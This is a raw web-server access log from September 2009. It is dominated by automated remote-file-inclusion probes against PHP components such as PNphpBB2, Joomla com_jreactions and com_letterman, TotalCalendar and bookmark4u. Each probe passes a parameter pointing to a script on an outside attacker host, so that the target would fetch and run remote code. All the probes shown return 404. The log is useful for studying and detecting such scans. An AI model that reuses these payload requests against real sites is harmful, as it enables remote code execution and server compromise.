190.144.44.36 - - [12/Sep/2009:02:30:15 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:15 -0400] "GET /logs/access_log.Q109052200///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:15 -0400] "GET /logs/access_log.Q109053100///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
61.6.216.226 - - [12/Sep/2009:02:30:15 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
209.172.33.230 - - [12/Sep/2009:02:30:16 -0400] "GET /logs/access_log.Q109081200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Sep/2009:02:30:16 -0400] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Sep/2009:02:30:16 -0400] "GET //administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
190.144.44.36 - - [12/Sep/2009:02:30:19 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:19 -0400] "GET /logs/access_log.Q109052200///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:19 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:19 -0400] "GET /logs/access_log.Q109053100///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:20 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:20 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:20 -0400] "GET /logs/access_log.Q109052200///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:20 -0400] "GET /logs/access_log.Q109053100///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.172.33.230 - - [12/Sep/2009:02:30:23 -0400] "GET /logs/access_log.Q109071200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.812"
190.144.44.36 - - [12/Sep/2009:02:30:24 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:24 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:24 -0400] "GET /logs/access_log.Q109052200%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:24 -0400] "GET /logs/access_log.Q109053100%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:33 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:33 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:33 -0400] "GET /logs/access_log.Q109052200%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:33 -0400] "GET /logs/access_log.Q109053100%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.172.33.230 - - [12/Sep/2009:02:30:35 -0400] "GET /logs/access_log.Q109081200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Sep/2009:02:30:35 -0400] "GET //administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Sep/2009:02:30:35 -0400] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.812"
209.172.33.230 - - [12/Sep/2009:02:30:36 -0400] "GET /logs/access_log.Q109071200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.812"
61.6.216.226 - - [12/Sep/2009:02:30:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01856F454DB70500A2A607I+M37+ENG HTTP/1.1" 200 38033 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
67.19.118.186 - - [12/Sep/2009:02:30:41 -0400] "GET /logs/access_log.Q109083000/start.php?pag=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
67.19.118.186 - - [12/Sep/2009:02:30:42 -0400] "GET /start.php?pag=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
67.19.118.186 - - [12/Sep/2009:02:30:42 -0400] "GET /logs/start.php?pag=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
190.144.44.36 - - [12/Sep/2009:02:30:47 -0400] "GET /logs/access_log.Q109052200%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:47 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:47 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:30:47 -0400] "GET /logs/access_log.Q109053100%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.172.33.230 - - [12/Sep/2009:02:32:37 -0400] "GET /logs/access_log.Q109081200%20//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.812"
118.107.162.36 - - [12/Sep/2009:02:32:45 -0400] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:32:45 -0400] "GET /logs/access_log.Q109081200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:32:45 -0400] "GET //administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:32:58 -0400] "GET /logs/access_log.Q109071200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:33:11 -0400] "GET /logs/access_log.Q109081200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:33:11 -0400] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:33:11 -0400] "GET //administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
118.107.162.36 - - [12/Sep/2009:02:33:19 -0400] "GET /logs/access_log.Q109071200//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Sep/2009:02:33:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.18.236.8 - - [12/Sep/2009:02:34:36 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:02:34:36 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:02:34:36 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.19.118.186 - - [12/Sep/2009:02:34:40 -0400] "GET /logs/access_log.Q109052900/start.php?pag=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
70.90.108.169 - - [12/Sep/2009:02:36:50 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:36:50 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:36:50 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:36:58 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:36:58 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:36:58 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.107.162.36 - - [12/Sep/2009:02:37:25 -0400] "GET /logs/access_log.Q109081200%20//administrator/components/com_jreactions/langset.php?comPath=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
85.18.236.8 - - [12/Sep/2009:02:38:26 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:02:38:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/Sep/2009:02:38:56 -0400] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:38:56 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:38:56 -0400] "GET /logs/access_log.Q109081400//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:02:39:26 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:02:39:26 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:02:39:26 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:02:39:40 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:40:34 -0400] "GET //include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:40:34 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:40:34 -0400] "GET /logs//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:41:06 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:41:06 -0400] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:41:06 -0400] "GET /logs/access_log.Q109081400%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:41:09 -0400] "GET /logs/access_log.Q109080100//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:41:11 -0400] "GET /logs/access_log.Q109081400%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:41:50 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:02:41:53 -0400] "GET /logs/access_log.Q109071300%20%20//newspublish/include.php?path[docroot]=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:42:13 -0400] "GET /logs/access_log.Q109080100%20%20//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:02:42:23 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path[docroot]=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:02:42:31 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:02:42:37 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
88.191.95.106 - - [12/Sep/2009:02:42:59 -0400] "GET /logs/access_log.Q109083000/start.php?pag=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
88.191.95.106 - - [12/Sep/2009:02:43:00 -0400] "GET /start.php?pag=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
88.191.95.106 - - [12/Sep/2009:02:43:23 -0400] "GET /logs/access_log.Q109083000/start.php?pag=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
88.191.95.106 - - [12/Sep/2009:02:43:23 -0400] "GET /start.php?pag=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
88.191.95.106 - - [12/Sep/2009:02:43:23 -0400] "GET /logs/start.php?pag=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
209.59.12.99 - - [12/Sep/2009:02:43:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.34.163.101 - - [12/Sep/2009:02:47:37 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:02:47:37 -0400] "GET /logs/access_log.Q109080400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:02:47:37 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:02:47:41 -0400] "GET /logs/access_log.Q109072600%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.22.167 - - [12/Sep/2009:02:47:44 -0400] "GET /logs/access_log.Q109091200 HTTP/1.0" 200 191947 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/Sep/2009:02:48:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.215.235.2 - - [12/Sep/2009:02:49:13 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:02:49:13 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:02:49:14 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:02:49:14 -0400] "GET /logs/error_log.Q109072100%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:02:49:14 -0400] "GET /logs/access_log.Q109080800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:02:49:14 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:02:49:14 -0400] "GET /logs/error_log.Q109072100%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:02:49:14 -0400] "GET /logs/access_log.Q109080800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.19.118.186 - - [12/Sep/2009:02:50:54 -0400] "GET /logs/access_log.Q109083000%20%20/start.php?pag=http://sospendipure.altervista.org/sca/r0x-id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.831"
88.191.95.106 - - [12/Sep/2009:02:51:04 -0400] "GET /logs/access_log.Q109052900/start.php?pag=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
66.148.68.101 - - [12/Sep/2009:02:52:23 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:02:52:23 -0400] "GET /logs/access_log.Q109072200//skin/ggambo7002_board/write.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:02:52:23 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:02:52:23 -0400] "GET /logs/access_log.Q109072500//skin/ggambo7002_board/write.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:52:50 -0400] "GET /logs//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:52:50 -0400] "GET //include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:52:51 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:53:02 -0400] "GET //include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:53:02 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:53:02 -0400] "GET /logs//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:53:27 -0400] "GET /logs/access_log.Q109080100//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:53:34 -0400] "GET /logs/access_log.Q109080100%20%20//include/write.php?dir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:02:53:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.34.163.101 - - [12/Sep/2009:02:54:09 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:02:54:09 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:02:54:09 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:02:54:19 -0400] "GET /logs/access_log.Q109072200%20%20//skin/ggambo7002_board/write.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:02:54:19 -0400] "GET /logs/access_log.Q109072500%20%20//skin/ggambo7002_board/write.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:02:54:27 -0400] "GET /logs/access_log.Q109072200%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
67.19.118.186 - - [12/Sep/2009:02:55:22 -0400] "GET /logs/access_log.Q109083000/start.php?pag=http://sospendipure.altervista.org/sca/r0x-id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
121.169.189.169 - - [12/Sep/2009:02:55:23 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76380 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
